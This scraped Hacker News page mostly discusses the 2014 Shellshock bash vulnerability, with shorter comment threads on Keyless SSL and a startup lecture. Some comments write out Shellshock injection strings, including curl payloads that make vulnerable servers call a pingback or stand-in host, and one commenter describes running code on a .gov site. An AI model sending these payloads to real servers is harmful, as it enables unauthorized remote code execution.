I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

5
cft 6 hours ago 1 reply      
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src  cd /src  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz  #download all patches  for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done  tar zxvf bash-4.3.tar.gz   cd bash-4.3  #apply all patches  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done  #build and install  ./configure && make && make install
Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

6
antocv 6 hours ago 2 replies      
Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

7
userbinator 3 hours ago 0 replies      
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

8
masterleep 13 hours ago 2 replies      
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

9
JoshTriplett 11 hours ago 3 replies      
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'    exploit

10
agwa 13 hours ago 4 replies      
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

11
Eclyps 9 hours ago 3 replies      
Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

12
khaki54 13 hours ago 1 reply      
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

13
0x0 4 hours ago 2 replies      
The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929
14
_wmd 12 hours ago 1 reply      
As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
15
h43k3r 8 hours ago 1 reply      
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

16
flebron 12 hours ago 2 replies      
Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.
17
why-el 10 hours ago 1 reply      
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
18
MBlume 8 hours ago 3 replies      
I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

19
Zweihander 13 hours ago 1 reply      
20
gwillem 7 hours ago 3 replies      
This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

21
m4r71n 12 hours ago 0 replies      
Some more information was just posted to oss-sec:

http://seclists.org/oss-sec/2014/q3/650

22
AnimalMuppet 11 hours ago 1 reply      
Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

23
AntiRush 5 hours ago 1 reply      
It seems like the current patch might not be a complete fix:

http://seclists.org/oss-sec/2014/q3/671

24
Oculus 13 hours ago 4 replies      
Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?
25
rurban 1 hour ago 0 replies      
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.
26
iuguy 12 hours ago 3 replies      
My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  vulnerable  this is a test

27
BenjaminCoe 9 hours ago 1 reply      
Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse
28
detectify 6 hours ago 0 replies      
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
29
ecze 12 hours ago 2 replies      
With this bug, bash access to CiscoCallmanager is possible... Tested and working....
30
jtchang 7 hours ago 0 replies      
For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

31
sauere 13 hours ago 1 reply      
No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

32
saurabhnanda 10 hours ago 0 replies      
Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

33
ilconsigliere 12 hours ago 2 replies      
Am I wrong in thinking that seems a bit worse than Heartbleed?
34
SchizoDuckie 8 hours ago 0 replies      
I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

35
jdimov 9 hours ago 1 reply      
All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?
36
jamiepenney 3 hours ago 0 replies      
Looks like Raspian have updated their bash package with the fix, so my Raspberry Pi is safe.
37
vhost- 8 hours ago 0 replies      
For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

38
throwaway49152 6 hours ago 2 replies      
What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

39
Sanddancer 10 hours ago 3 replies      
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
40
piratebroadcast 10 hours ago 0 replies      
My friend tried it on Heroku - It is affected.
41
kacy 11 hours ago 0 replies      
Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

42
korzun 13 hours ago 2 replies      
FreeBSD appears to be affected.
43
super_mario 9 hours ago 3 replies      
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION    3.2.51(1)-release    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"    bash: warning: x: ignoring function definition attempt    bash: error importing function definition for `x'    this is a test    $
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION    4.3.25(1)-release    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"    bash: warning: x: ignoring function definition attempt    bash: error importing function definition for `x'    this is a test    $

44
snissn 8 hours ago 0 replies      
Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash  foo

45
wyager 11 hours ago 0 replies      
This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

46
jacksoncage 7 hours ago 0 replies      
Saved a lot of time again today with salt! $ salt * pkg.install bash refresh=Trueand then check for right version$ salt * pkg.version bash
47
mirashii 11 hours ago 0 replies      
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.
48
ck2 12 hours ago 1 reply      
http://www.csoonline.com/article/2687265/application-securit...

Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

49
kazinator 12 hours ago 0 replies      
Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

50
kalops 13 hours ago 4 replies      
so basically turn off AcceptEnv in sshd_config?
51
FranOntanaya 9 hours ago 0 replies      
Saucy wasn't patched by the time I did a do-release-upgrade a while ago.
52
pbrumm 9 hours ago 0 replies      
Don't forget to update your docker containers and restart them.
53
sauere 12 hours ago 0 replies      
Also: i was not able to test it yet since i am still on the road, but i belive the Cisco AnyConnect VPN client OS-detection is affected
54
ck2 13 hours ago 3 replies      
Has the redhat patch been pushed through centos yet?
55
mmagin 10 hours ago 0 replies      
The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025
56
peterwwillis 10 hours ago 1 reply      
Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something  else outside your program--at least, not by accident. All command line  arguments, environment variables, locale information (see perllocale),  results of certain system calls (readdir(), readlink(), the variable  of shmread(), the messages returned by msgrcv(), the password,  gcos and shell fields returned by the getpwxxx() calls), and all  file input are marked as "tainted".  Tainted data may not be used directly or indirectly in any command  that invokes a sub-shell, nor in any command that modifies files,  directories, or processes, with the following exceptions:

57
javert 11 hours ago 3 replies      
So if a machine is not running a web server, does that mean that machine is not vulnerable?
58
piratebroadcast 10 hours ago 1 reply      
Someone please ELI5 (Explain Like I'm 5)?
59
piratebroadcast 10 hours ago 0 replies      
Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png
60
zobzu 12 hours ago 4 replies      
I have a feeling this is blown out of proportion.Who's running bash setuid exactly? Right.Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

5
Announcing Keyless SSL
507 points by jgrahamc  6 days ago   184 comments top 27
1
lucb1e 6 days ago 3 replies      
For those who want to understand how it works (it took me a minute, so I'll try to explain it simpler):

In simplified terms, the server usually stores a public and private key, and sends the public key to the client. The client generates a random password, encrypts it with the server's public key, and sends it to the server. Only anyone with the private key can decrypt the message, and that should only be the server.

Now you don't want to hand over this private key to Cloudflare if you don't need to, because then they can read all traffic. Up until now, you needed to.

What they did was take the private key and move it to a keyserver, owned by your bank or whomever. Every time the Cloudflare server receives a random password (which is encrypted with the public key) it just asks the keyserver "what does this encrypted message say?" After that it has the password to the connection and can read what the client (the browser) is sending, and write data back over the same encrypted connection. Without ever knowing what the private key was.

The connection from Cloudflare to your bank's webserver and keyserver can be encrypted in whatever way. It could be a fixed key for AES, it could be another long-lasting TLS connection (the overhead is mostly in the connection setup)... this isn't the interesting part and can be solved in a hundred fine ways.

Edit: Removed my opinion from this post. Any downvotes for my opinion would also push the explanation down (which I hope is useful to some). I mostly agree with the other comments anyway.

2
indutny 6 days ago 2 replies      
And my patch for OpenSSL that does the same thing: https://gist.github.com/indutny/1bda1561254f2d133b18 , ping me on email if you want to find out how to use it in your setup.
3
delinka 6 days ago 5 replies      
Instead of keeping the key in a potentially vulnerable place, they're putting it in an oracle: pass ciphertext to the oracle, get plaintext back. I'm interested in the authentication between CloudFlare and the oracle. Cryptographic examples involving an oracle tend to refer to the oracle as a black box that just blindly accepts data, transforms it, and replies. Of course, then the oracle's content (a key, an algorithm) risks exposure through deduction if an attacker can submit limitless requests. See http://en.wikipedia.org/wiki/Chosen-plaintext_attack

I'm not at all suggesting that CF hasn't thought of this; rather I want to see their mitigation of the risk.

4
mhandley 6 days ago 3 replies      
This seems to only slightly reduce the threat to the banks.

Currently, if someone compromises the Cloudfare servers, they gain the bank's private key and can impersonate the bank until the bank revokes their keys.

With this solution, if someone compromises the Cloudfare servers, they can impersonate the bank by relaying the decryption of the premaster secret through Cloudfare's compromised servers back to the bank. They can do this until Cloudfare notices and closes the security hole.

It's not clear that the difference is all that great in reality, as most of the damage will be done in the first 24 hours of either compromise.

5
personZ 6 days ago 4 replies      
After reading the beginning of the piece, I was expected something more...profound. Some deep mathematical breakthrough or something.

Instead they separate the actual key signing, delegating it to the customer's device. That's nice and useful, but isn't quite what I was expecting.

6
teddyh 6 days ago 4 replies      
So the communication between Cloudflare and the actual SSL key holder is secured by what? Another key? In that case, any compromise of Cloudflares key is the same as a compromise of the original SSL key (at least in the short term).
7
otterley 6 days ago 4 replies      
Keyless SSL is basically an analogue of ssh-agent(1) for OpenSSL. It's a nice feature that you no longer have to trust CloudFlare with your private key, but there's a huge tradeoff: if your keyserver is unavailable (ironically, due to any of the things CloudFlare is supposed to protect you from or buffer you against -- DDoS, network/server issues, etc.), they can no longer authenticate requests served on your behalf and properly serve traffic.
8
windexh8er 6 days ago 2 replies      
All other technicalities aside it's rather interesting. From an HSM perspective it either makes that hardware now very useful or very useless.

Think of a large organization - you've been there (or not), there are 30 internal applications with self-signed certificates. Fail. The organization had purchased an HSM, but never really got it deployed because - well, that was too complex and it didn't integrate well with 3rd party network hardware and failed miserably in your *nix web stack.

This could be interesting - and I'm not commenting with regard to the efficacy or security concerns around this, but mainly the workflow simplicity it provides to large organizations who end up in self-signed-cert-hell because HSMs don't interoperate easily in a lot of use cases.

But to my original statement - this is a very good thing or a very bad thing for Thales and the like. The only requirement for an actually certified HSM, really, is certification against some hardware and software standard you have a checkbox to fulfill. Beyond that this would be a killer in the middleground for those who want an HSM like functionality but don't have any requirements to meet other than housing a secure segment where key management can be done in a more controlled manner.

9
vader1 6 days ago 1 reply      
While this is a cool feature, I wouldn't say the improvement is more than marginal: all potentially sensitive customer data is still available to Cloudflare in plain text. And after all, with a Business plan you can already use your own ("custom") SSL certificate which you can then revoke at any time.

Why not offer a "pass through" mode where the proxying is done on the network layer rather than the application layer? Of course in such a modus all CDN-like functionality could no longer be offered, but it could still do a fair amount of DDOS protection, no?

10
mback2k 6 days ago 0 replies      
So, this is not actually keyless SSL but SSL using something like a Hardware Security Module over networked PKCS#11. Did I miss something?
11
zaroth 6 days ago 1 reply      
See: Secure session capability using public-key cryptography without access to the private key.

https://www.google.com/patents/US8782774

12
praseodym 6 days ago 4 replies      
So CloudFlare won't get your private key, but will still get to see unencrypted plaintext for all traffic? Sounds like a huge improvement...
13
xorcist 6 days ago 1 reply      
The article is somewhat light on content. There are standard protocols for HSM use. What is the reason you didn't use these? There are clear risks involved with inventing your own security related protocols.
14
_pmf_ 6 days ago 0 replies      
Are we reinventing Kerberos again?
15
blibble 6 days ago 3 replies      
isn't this completely missing the point, i.e. banks being able to say 'no third parties can see our clients identifying information/balances/etc?'

yes, the SSL key doesn't leave the bank, but everything it is protecting is..

16
bjornsing 6 days ago 0 replies      
> World-renowned security experts Jon Callas and Phil Zimmermann support CloudFlare's latest announcement sharing, One of the core principles of computer security is to limit access to cryptographic keys to as few parties as possible, ideally only the endpoints. Application such as PGP, Silent Circle, and now Keyless SSL implement this principle and are correspondingly more secure.

Ehh... I'd say Keyless SSL implements the opposite of that principle: encryption terminates with CloudFlare but authentication terminates in some bank.

17
yk 6 days ago 0 replies      
So the problem is, how to get a cloud in the middle while keeping the green lock in the browser? Just yesterday I read Douglas Adam's phrase "technologies biggest success over itself."
18
kcbanner 6 days ago 1 reply      
Interesting, but what about the latency issues of having to always contact the key server?
19
sarciszewski 6 days ago 0 replies      
That is amazing. I can't wait to play with this code :D
20
yusyusyus 6 days ago 1 reply      
How does this architecture address PFS? I'm guessing a future version would require the exchange of DH private key to make it work...
21
ambrop7 6 days ago 1 reply      
I don't like to sound hateful, but this is an obvious solution that any competent person knowing how TLS works would find. If someone tried to patent it, I suppose every smart card would be considered prior art. The only "novelty" is that the connection to the "smart card" is the network.

Not to say that it's not useful, but the article describes it as some grand invention.

22
general_failure 6 days ago 0 replies      
Well, cloudfare can still read all the traffic. I thought that problem had been solved somehow.
23
diafygi 6 days ago 1 reply      
Is this the free SSL announcement that CloudFlare said it was going to announce in October?
24
liricooli 5 days ago 0 replies      
It seems that the correct title should have been "all your keys are belong to us".
25
EGreg 6 days ago 0 replies      
Wow, what a great read!
26
ilaksh 6 days ago 1 reply      
This is a discussion about cyberwarfare in a literal sense. The technical discussion shouldn't really be separated from the economic, political, social and human health concerns because all of those parts of the system interact deeply and directly.

A goal of total political cooperation or submission leads to economic sanctions leading to serious human health effects leading to defensive denial of service attacks. This accelerates the need to decentralize the financial network systems to make them more robust.

How can we imagine though that even after a complete transition to next generation systems that are ground-up distributed designs (not just stop-gap tweaks like this) that we won't have new types of attacks to deal with.

The starting point is the belief system that provides such fertile ground for conflict. We have to promote the idea that human lives have value and that lethal force is not an acceptable way to resolve conflict.

As long as decision makers are living in a sort of 1960s James Bond fantasy world we will all be subject to the insecurity of that type of world. Its largely built upon a type of primitive Social Darwinism that is still much more prevalent than most will acknowledge.

Its much easier to accept a compartmentalization of these problems and focus on a narrow technical aspect, but that does not integrate nearly enough information.

27
zameericle 6 days ago 1 reply      
Sounds like Elliptic Curve Diffie-Hellman is used between client/server to establish a private key. Not sure how this is new.
6
Lecture 1 How to Start a Startup [video]
484 points by declan  1 day ago   176 comments top 44
1
philipDS 1 day ago 8 replies      
I made some notes while watching/listening. Might include minor errors or misinterpretation on my side

4 critical parts: Idea, Team, Product, Execution

1. Idea

-> Good startups take about 10 years

-> Startup should feel like an important mission

-> Hardest part coming up with great ideas: best look terriblea t the beginning (e.g. search engine, social networks limited to college students without money, a way to stay at stranger's couches)

-> "Today only a small subset of users want to use my product, but I'm going to get all of them"

-> You need to believe and willing to ignore naysayers

-> Most people will think your idea is bad: be happy. they won't compete. it's not dangerous to tell people your idea.

-> it's okay if it doesn't sound big at first. first version should take over a small specific market and expand from there. unpopular but right

-> take the time to think about how the market will evolve. market size in ~10 years. think about growth rate of the market instead of its current size. small, but rapidly growing market! people are desperate for a solution

-> you cannot create a market that does not exist

-> there are many great ideas, pick and find one you really care about.. "SW is eating the world"

-> "Why Now?" - dixit Sequoia - have a great answer to this question

-> Build something that you yourself need. You'll understand it a lot better.

-> Get close to your customers. Work in their office or talk to them multiple times a day

-> If it takes more than a sentence to you know what you're doing, it likely is too complicated

-> "Do more when you're a student." Think about new ideas and meet potential co-founders

-> Think about the market first and you'll have a big leg up

2. Product

-> Great Idea > Great Product > Great Company

-> Until you build a great product, almost nothing else matters

-> Sit in front of the computer working on product, or talk to your customers

-> Biz Dev, Raising Money, Raising Press, Hiring are significantly easier when you have a great product

-> Step 1: build something that users love

-> YC is all about: Exercise, Eat, Sleep, Work on Product and Talk to Customers

-> "It's better to build something that a small number of users love, than a large number of users like"

-> Get growth by word of mouth. This works for consumer as well as enterprise products. You'll see organic growth. If you don't have some early organic growth, then your product isn't good enough. It's the secret sauce to growth hacking.

-> Breakout companies always have a product that's so good that grows on word of mouth

-> Great products win. Make something users love.

-> Keep it simple. Look at first versions of Google, Facebook, iPhone

-> Founders care about small details. They're fanatical

-> One thing that correlates with success is hooking up PagerDuty to their ticketing system. Response time within an hour.

-> Go recruit your first users by hand to get feedback every day.

-> When everyone tought Pinterest was a joke, Ben Silbermann walked around coffee shops in Palo Alto to convince people to use Pinterest. He set Pinterest to the home page in the Palo Alto public library so people would discover the website. Do things that don't scale. Read Paul Graham's essay.

-> Create a tight feedback loop. What do users like? What do they pay for? What would make them recommend it?

-> Try to keep your feedback loop going for all of your companies' life

-> Do sales and customer support yourself in the early days. This is critical. Do not hire these people right away.

-> Keep track of metrics. Look at active users, activity levels, cohort retention, revenue, etc. Be brutally honest if they don't go in the right direction

-> If you don't get your product right, nothing else in this class will matter.

Why start a startup?

-> "It's glamorous", "You'll be the boss", "Flexibility", ...

-> Entrepreneurship gets romanticized

-> The reality is not so glamorous. It is a lot of hard work. You're sitting at your desk, focused, figuring out hard engineering projects. It is quite stressful.

-> Founder depression is a real thing. If you start a company, it's gonna be extremely hard

-> You have loads of responsilibity

-> You're responsible for the opportunity cost of the people who decide to follow and help you out

-> You're more committed. A founder cannot leave a company. For 10 years if it's going well. Probably for 5 years if it's not going well.

-> "Number one role of a CEO is managing your own psychology"

-> You're always on call, you're a role model. You'll always be working anyway

-> If you joined Dropbox or Facebook early on, your financial reward might be a lot better than when starting a startup

-> If you join a later stage startup, you have more impact - massive userbase, existing infrastructure, work with an established team. E.g. Brett Taylor was employee #1500 at Google and he invented Google Maps. He got a big financial reward for this.

-> What's the best reason? You can't NOT do it. You have to make it happen

-> Do it out of passion

-> The world needs it (if not, go do something else) and/or the world needs you (you're well-suited to do it). The world needs you somewhere, find where.

2
tucaz 1 day ago 11 replies      
I've been watching it for 8 minutes as of now and despite the fact that the content looks good it really bores me to death that he is reading the whole thing like a robot. It does not sound like a natural converstation or presentation. Does anyone else share this feeling?
3
mbesto 1 day ago 3 replies      
Dustin talks about Financial Reward and Impact of "why to do a startup" for examples like Facebook and Dropbox here: https://www.youtube.com/watch?v=CBYhVcO4WgI#t=2161

Are these values correct? If you join Dropbox as employee #100 with 10bp, you're 10bp is going to get massively diluted through subsequent rounds, no? Isn't it more like $1-2mil? And also this is wealth on paper, which means that you don't all of the sudden have $10mil sitting in the bank. I don't think he explains that but that's how it's portrayed, and is probably worth explaining, given the audience.

4
cjmb 1 day ago 2 replies      
On Sam's part -- am I the only one who got the "heard this before" feeling? Obviously he attributed everything pretty appropriately, but I thought I could've placed 50-75% of his sentences in the "Summary" sections of various PG essays, Peter Thiel writings, and other luminaries of the startup-sphere.

I'm not saying it was wrong or that his delivery was bad. But I remember reading the Class Notes from Thiel's class after Blake made them available and thinking "Wow, there's some original thoughts in here I haven't come across before."

Maybe it's because PG already put it all to paper, and some of these other figures just added post scripts. Maybe it was a solved problem by the time Sam got a seat at the table. Just some food for thought. Looking forward to the other lectures regardless.

5
kartikkumar 11 hours ago 1 reply      
One thing that bothered me about the lecture was reinforcement of the idea that working hard is the same as working long. I can appreciate the fact that at times as a founder you have to work all hours of the day, but surely this is not the optimum scenario for maximum productivity. If I look at my own work situation currently, it's abundantly apparent to me that the law of diminishing returns affects me strongly after working 8-10 hrs straight.

I would have expected the message to be that the most successful founders in the long-term are the ones that figure out the right work/life balance, to ensure they don't burn out. In other words, successful founders are able to be focussed and driven for the hours that they work, and in recharge-mode when offline.

This is intuitively what I would have expected and I'm curious if the message from the lecture of "work all day, everyday" is really right.

6
bcjordan 22 hours ago 0 replies      
To temper some of the nit picks, just wanted to say this lecture felt insightful and fun to watch. I hope YC continues this trend of investing effort in shareable advice content in the spirit of pg's essays.

This is the first time a lot of the YC flavor of startup how-to material has been presented in a lecture video format[1]. I suspect much of the long-term audience of these lectures wouldn't have come across pg's essays, Blake Masters' Peter Thiel startup notes or Dustin Moskovitz's excellent Medium posts before. Maybe some lecture watchers were allergic to long-form articles, or maybe some would rather receive a weekly email with videos. Myself, I consume this sort of material on my walk to work, either text-to-speeching essays or listening to lectures. The video lecture format was especially fun, I watched it full screen on the TV while eating an enchilada and poking my fiancee about points she might find relevant to her side project. How often do you get to consume this sort of content like that?

Having read pg's essays[2], I still had a number of "aha!" moments from Sam's slides and hearing his presentation. And hearing Dustin describe in his low-key tone why you should be employee 1,000 at an obviously successful startup rather than start your own, and backing it up with charts and photo-jokes about the elephant in the room was just entertaining. Seeing "this is how we'll teach you to do this thing. Here's an expert on why not to do this thing." is not always the type of juxtaposition you get with standalone online essays.

Looking forward to the next lecture. I'd say it's well worth the time and opportunity cost of putting this all together, so thanks all involved.

[1]: Yes, some Lean Startup and Principles of Entrepreneurship flavored material has been presented in lecture format before, but not YC lensed AFAIK.

[2]: Okay, I skipped the early seemingly pure-Lisp-focused ones. Though like Zen and the Art of Motorcycle Maintenance isn't about a long motorcycle trip, and maybe pg's Lisp essays are not really all about writing Lisp?

7
dheer01 18 hours ago 1 reply      
Disagree completely with the very first opinion expressed - 'Don't do a startup just to do one - do it only if you really want to solve a problem'.

India has produced about 3 big ~billion dollar compaines in the recent past - inmobi, flipkart, druvaa. None of the founders really started to 'solve' a problem they were passionate about. What they were really passionate about was just 'starting up' - and based on their personal strengths, industry knowledge and what they thought could be sold, stumbled on these big businesses. This was probably true for HP too.

It is absolutely ok to do a startup just for the heck of it. Get in the game and find out the intersection of what you can build and what a customer will buy. If you build a big business - the passion will follow. Do not forget to bullshit though on your big interview on how the so solved problem kept you awake at nights - it makes for some good reading and impressionable pr.

8
agentultra 11 hours ago 0 replies      
Great presentation and very clear that the rest of the course will be focusing on advice for SV-style hyper-growth startups.

There's still some good advice for those of us not interested in that life style. I was particularly taken with the idea of building something that just a handful of people will really love. Having a rapt-audience for your product would be a huge win if you decide to build more, scale up, or sell out.

I think it's really good that they're at least trying to convey how difficult building the style of companies they're talking about can be. I can appreciate how challenging that must be. The cultural yard-stick for success these days are valuations and IPOs. There's a ton of pressure to go that route especially from YC. I'm glad they're being conscientious about it even if they don't 100% succeed at removing some of the glimmer from the stars in peoples' eyes.

There's nothing wrong with wanting to start a smaller enterprise and aspire to keep just a handful of customers you know by name.

9
smuss77 1 day ago 10 replies      
@3:12: "There are much easier ways of getting rich." Could I get some examples? Thank you!
10
Reltair 1 day ago 0 replies      
The recommended reading from the final slide:

- The Hard Thing About Hard Things

- Zero to One (CS 138A)

- The Facebook Effect

- The 15 Commitments of Conscious Leadership

- The Tao of Leadership

- Nonviolent Communication

11
bayesianhorse 23 hours ago 1 reply      
There are easier ways to get rich? For Stanford Graduates, maybe. For those who don't have a degree in an ultra-paying job, I'd really like to know an easier way.

I'm usually sceptical about start-up chances, I know how much work it means, and I know that a lot of early-stage employees get rich, too. Yet, I don't think you can get rich this fast/easy with a modest degree... Even as early-stage employee often you'll still get a raw deal or you overestimate their chances of success.

12
jduhamel 1 day ago 0 replies      
The presentation style is a bit rough but the material is gold.
13
ckvamme 6 hours ago 0 replies      
I posted some casual, but in depth notes on my site for anyone wanting to skip the video:

http://chriskvamme.com/

14
jtwebman 21 hours ago 0 replies      
Wow this was good information. It really got me thinking on what my reasons are and how bad they might be. Did anyone else get that from this?

I would also love if they cover how you work on a startup if you still have the 40 hours a week programming job as well. And how to avoid getting in trouble or legal issues with your job.

15
piotry 13 hours ago 0 replies      
Funny that I just wrote about how I was considering killing a startup I started: https://medium.com/@piotr/i-failed-82b9469977ac?source=lates...

Probably the best way to know how to build a successful one is knowing how to build one that won't fail!

16
bramgg 1 day ago 2 replies      
@2:22: "You may still fail. The outcome is something like Idea x Product x Execution x Team x Luck, where Luck is a random number between 0 and 10,000, literally that much."

What does that mean? I'm not trying to rip on the video or anything like that, but am genuinely curious as to how much luck Sam Altman thinks is involved in a startup.

17
coralreef 21 hours ago 1 reply      
Sam mentioned that the idea was actually quite important. I recall PG saying that YC would often invest in the team because ideas change and aren't as important as good founders.

Anyone have thoughts on this?

18
rdlecler1 1 day ago 2 replies      
Sam: "Step 1, build something that users love"

